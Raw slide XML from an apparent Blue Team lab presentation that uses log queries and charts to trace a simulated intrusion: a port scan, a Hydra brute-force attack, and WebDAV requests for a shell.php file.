            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Client confirmed success.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1144" name="Google Shape;1144;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45" name="Google Shape;1145;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1146;p63"/>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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6408670" y="1481374"/>
            <a:ext cx="23715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endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Graphical user interface, text, website&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C38D829-1E43-2A9C-E150-57F77B98F844}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6408670" y="1586466"/>
            <a:ext cx="2428500" cy="564913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface, text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1095A0FA-285B-5A07-1CDF-3908494B38D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400757" y="2407320"/>
            <a:ext cx="2428500" cy="494815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Graphical user interface&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE8A46E6-B33E-25D7-9FAB-556D8D78D994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6408670" y="3149323"/>
            <a:ext cx="2428500" cy="372849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2001671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pic>
        <p:nvPicPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1687275"/>
            <a:ext cx="8595300" cy="88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Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">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154" name="Google Shape;1154;p6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15</a:t>
            </a:fld>
            <a:endParaRPr sz="6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Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161" name="Google Shape;1161;p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63" name="Google Shape;1163;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="675975"/>
            <a:ext cx="8255675" cy="1201316"/>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AU" sz="1200" dirty="0"/>
              <a:t>The port scan from 192.168.1.90 occurred on the 12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0"/>
              <a:t> July 2022 at roughly 1130-1300</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0"/>
              <a:t>Multiple ports were queried within a short space of time from IP 192.168.1.90 indicating a port scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0"/>
              <a:t>There were 3110 unique flows at around 1130 from IP 192.168.1.90 in a short space of time in fact the line is almost vertical indicating a very short space of time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0"/>
              <a:t>It should be noted that transaction errors also skyrocketed during this time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0"/>
              <a:t>User agent indicated a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0"/>
              <a:t> scripting engine as seen on the right although only for Apache log.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{377DFB7B-1D58-53A8-81CC-7278086778C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="745818"/>
            <a:ext cx="426757" cy="329213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Chart, bar chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D67FB1-3638-960D-F6A1-05B438770BB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3181513" y="2018586"/>
            <a:ext cx="2627347" cy="1081178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Histogram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F35D0600-3E4D-2C28-0684-787A765A918B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3152552" y="3218004"/>
            <a:ext cx="2751603" cy="1130016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Chart&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB817C47-51CD-A43A-598E-CC956F48AFD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="417049" y="2018586"/>
            <a:ext cx="2735503" cy="1130016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B79BAFDE-03F0-CDF3-4B52-6BD15952032C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="417049" y="3300462"/>
            <a:ext cx="2735503" cy="981778"/>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FF9FBF81-A3C3-F45C-9E65-F19CA7D52DB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5904155" y="1986065"/>
            <a:ext cx="3049141" cy="111369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6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1171" name="Google Shape;1171;p6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US" dirty="0" err="1"/>
              <a:t>source.ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 192.168.1.90 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>destination.ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 192.168.1.105 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url.path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> : *secret* </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173" name="Google Shape;1173;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792051" y="741300"/>
            <a:ext cx="8662199"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AU" sz="1200" dirty="0"/>
              <a:t>26 requests were made to the secret folder on the company server</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>6 requests were made to tbe index with 2 successful connections to t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0"/>
              <a:t>he</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t> connect_to_corp_server file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>The access to the connect_to_corp_server file led to the eventual breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>Requests were made at roughly 1200 on the 12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t> July 2022</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="669524"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing shape&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DDE6BBD-23B2-664B-DDB1-F96619271E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1860434"/>
            <a:ext cx="4828309" cy="1097649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Chart, waterfall chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF2C332A-6A62-59C7-4C81-8076FFDD40EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562599" y="1800418"/>
            <a:ext cx="3345407" cy="1422631"/>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B5CCFABE-8BFF-32B6-5FBA-0332EDA3595F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562599" y="3487237"/>
            <a:ext cx="2775812" cy="112063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6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181" name="Google Shape;1181;p6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sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="823288" y="741300"/>
            <a:ext cx="8630962"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AU" sz="1200" dirty="0"/>
              <a:t>There were 16223 packet requests made by a Brute Force Attack specifically Hydra</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>A response code of 401 skyrocketted during the attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>Note this attack was carried out on on the 24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t> July 2022 due to issues during the 12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t> July 2022</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="398587" y="669524"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FCB5142-9739-4B87-897C-EE7906661D43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="646205" y="1643229"/>
            <a:ext cx="4063527" cy="1370135"/>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4B2EA27A-4FAE-3A37-9B01-DD2D5A465F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2944090" y="2710941"/>
            <a:ext cx="5472545" cy="1254065"/>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B1ABD6FB-9F13-AD19-2C4D-048C672202EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4959927" y="1531641"/>
            <a:ext cx="3851564" cy="9422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Finding the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191" name="Google Shape;1191;p6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US" dirty="0" err="1"/>
              <a:t>source.ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 192.168.1.90 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>destination.ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 192.168.1.105 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url.path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> : *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775739" y="741300"/>
            <a:ext cx="8678511"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AU" sz="1200" dirty="0"/>
              <a:t>98 requests were made to this directory</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>14 requests were made for the shell.php another 8 for passwd.dav remaining were generic</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="351038" y="685236"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A picture containing calendar&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF97E52F-3ED2-A6EE-4CE3-B0193CDB237C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2715691" y="2028828"/>
            <a:ext cx="4165697" cy="1047595"/>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CD0D8EA1-747A-8EB4-3444-E2EAA7FC30E1}"/>
